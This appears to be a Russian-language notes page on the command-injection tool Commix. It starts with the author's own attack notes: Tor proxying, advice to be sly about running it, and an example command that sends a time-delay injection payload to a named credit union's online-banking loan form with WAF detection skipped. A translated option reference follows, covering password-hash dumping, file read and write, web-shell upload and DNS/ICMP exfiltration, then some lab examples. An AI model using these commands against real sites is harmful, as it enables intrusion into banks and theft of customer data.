Commix(comm]and [i]njection e[x]ploiter)

git clone https://github.com/stasinopoulos/commix.git commix

=============
+ тор –proxy="127.0.0.1:9050"
но с 1 сервака хуй так 2 комикса хапустишь НАДО думать хитрить как то

–level=3
–ignore-401
–skip-waf
–tamper=

example
./commix.py -u "https://www.communityfirst-yncu.com/Personal/ProductsAndServices/Borrowing/PersonalLoans/Apply/" –data="LoginTag.ShowForm=form%3Bstart-sleep+-s+5+%23&submit=Login+to+Online+Banking" –level=3 –ignore-401 –skip-waf
============
Описание Commix
Commix (это сокращение от [comm]and [i]njection e[x]ploiter) имеет простую среду и может использоваться веб-разработчиками, тестерами на проникновение и даже исследователями безопасности для тестирования веб-приложений в поисках багов, ошибок или уязвимостей, связанных с атаками инъекцией команд. С использованием этого инструмента очень легко находить и эксплуатировать уязвимости инъекции команд в конкретном уязвимом параметре или строке. Commix написан на языке программирования Python.

Exploiting DVWA (1.0.8) command injection flaws.
Exploiting bWAPP command injection flaws (normal & blind).
Exploiting ‘Persistence’ blind command injection flaw.
Exploiting shellshock command injection flaws.
Upload a PHP shell (i.e. Metasploit PHP Meterpreter) on target host.
Upload a Weevely PHP web shell on target host.
Exploiting cookie-based command injection flaws.
Exploiting user-agent-based command injection flaws.
Exploiting referer-based command injection flaws.
Rack cookies and commands injection.

Домашняя страница: https://github.com/stasinopoulos/commix
Автор: Anastasios Stasinopoulos
Лицензия: GPLv3
Справка по Commix

Использование:
python commix.py [опции]

Опции:
-h, –help Показать справку и выйти.

Общие:
Эти параметры являются общими при различном использовании.

–verbose Включить вербальный режим.
–version Показать номер версии и выйти.
–output-dir=OUT.. Установить пользовательский путь директории вывода.
-s SESSION_FILE Загрузить сессию из сохранённого (.sqlite) файла.
–flush-session Очистить файлы сессии для текущей цели.
–ignore-session Игнорировать результаты, сохранённые в файле сессии.

Цель:
Эти опции участвуют в определении URL цели.

-u URL, –url=URL Целевой URL.
–url-reload Перезагрузить целевой URL после выполнения команды.
-l LOGFILE Парсить цель и данные из лог файла HTTP proxy.

Запрос:
Эти опции могут использовать для определения, как подключаться к целевому URL.

–data=DATA Строка данных для отправки через POST.
–host=HOST Заголовок HTTP Host.
–referer=REFERER Заголовок HTTP Referer.
–user-agent=AGENT Заголовок HTTP User-Agent.
–random-agent Использовать случайно выбранный заголовок HTTP User-Agent.
–param-del=PDEL Установить символ для разделения значений параметра.
–cookie=COOKIE Заголовок HTTP Cookie.
–cookie-del=CDEL Установить символ для разделения значений cookie.
–headers=HEADERS Дополнительные заголовки (к примеру, ‘Header1:Value1nHeader2:Value2’).
–proxy=PROXY Использовать HTTP прокси (к примеру, ‘127.0.0.1:8080’).
–tor Использовать сеть Tor.
–tor-port=TOR_P.. Установить порт прокси Tor (по умолчанию: 8118).
–auth-url=AUTH_.. URL панели входа.
–auth-data=AUTH.. Параметры входа и данные.
–auth-type=AUTH.. Тип HTTP аутентификации (к примеру, ‘basic’).
–auth-cred=AUTH.. Учётные данные HTTP аутентификации (к примеру, ‘admin:admin’).
–ignore-401 Игнорировать HTTP ошибку 401 (Unauthorized).
–force-ssl Принудительное использование SSL/HTTPS.

Перечень:
Эти опции могут использоваться для перечисления свойств целевого хоста.

–all Получить всё.
–current-user Получить текущее имя пользователя.
–hostname Получить текущее имя хоста.
–is-root Проверить, имеет ли текущий пользователь привилегии рута.
–is-admin Проверить, имеет ли текущий пользователь привилегии админа.
–sys-info Получить информацию о системе.
–users Получить системных пользователей.
–passwords Получить хеши паролей системных пользователей.
–privileges Получить системные пользовательские привилегии.
–ps-version Получить номер версии PowerShell.

Доступ к файлам:
Эти опции могут использоваться для доступа к файлам на целевом хосте.

–file-read=FILE.. Прочитать файл с целевого хоста.
–file-write=FIL.. Записать файл на целевой хост.
–file-upload=FI.. Выгрузить файл на целевой хост.
–file-dest=FILE.. Абсолютный путь на хосте для записи и/или выгрузки.

Модули:
Эти опции могут использоваться для увеличения возможностей
выявления и/или инъекции.

–icmp-exfil=IP_.. Техника инъекции ‘icmp exfiltration’
(к примеру ‘ip_src=192.168.178.1,ip_dst=192.168.178.3’).
–dns-server=DNS.. Модуль инъекции ‘DNS exfiltration’.
(Доменное имя, используемое для атаки DNS exfiltration).
–shellshock Техника инъекции ‘shellshock’.

Инъекция:
Эти опции могут использоваться для указания, какие параметры вставлять для
инжекта и передачи пользовательских запросов инъекции.

-p TEST_PARAMETER Тестируемый параметр(ы).
–suffix=SUFFIX Суффиксная строка запроса для инъекции.
–prefix=PREFIX Префиксная строка запроса для инъекции.
–technique=TECH Указать технику(и) для инъекции.
–maxlen=MAXLEN Установить максимальную длину вывода для основанной
на времени технике инъекции (По умолчанию: 10000 символов).
–delay=DELAY Установить время задержки для основанных на времени
техник инъекции (По умолчанию: 1 секунда).
–tmp-path=TMP_P.. Установить абсолютный путь временной директории веб-сервера.
–root-dir=SRV_R.. Установить абсолютный путь рут директории веб-сервера.
–alter-shell=AL.. Использовать альтернативный шелл ОС (к примеру, Python).
–os-cmd=OS_CMD Выполнить отдельную команду операционной системы.
–os=OS Force back-end operating system to this value.
–tamper=TAMPER Использовать данный скрипт(ы) для всовывания данных инъекции.

Выявление:
Эти опции могут использоваться для настройки фазы выявления.

–level=LEVEL Уровень выполняемого тестирования (1-3, По умолчанию: 1).

Разное:
–dependencies Проверка на сторонние (не ключевые) зависимости.
–skip-waf Пропустить эврестическое обнаружение защиты WAF/IPS/IDS.

Примеры запуска Commix
Тестирование передаваемого пользователем параметра pingme страницы по адресу http://localhost/pingme/ (-u http://localhost/pingme/?pingme=hackware.ru):
1
sudo commix -u http://localhost/pingme/?pingme=hackware.ru
Тестирование передаваемого методом POST параметра name (–data=’name=-s’) страницы http://localhost/dvws/vulnerabilities/cmdi/client.php (-u http://localhost/dvws/vulnerabilities/cmdi/client.php):
1
sudo commix -u http://localhost/dvws/vulnerabilities/cmdi/client.php –data=’name=-s’
Примеры использования на различных уязвимых средах вы можете посмотреть по ссылке: https://github.com/stasinopoulos/com…Usage-Examples
Установка Commix
Программа предустановлена в Kali Linux.
Установка в BlackArch
Программа предустановлена в BlackArch.
==============================

Оставьте комментарий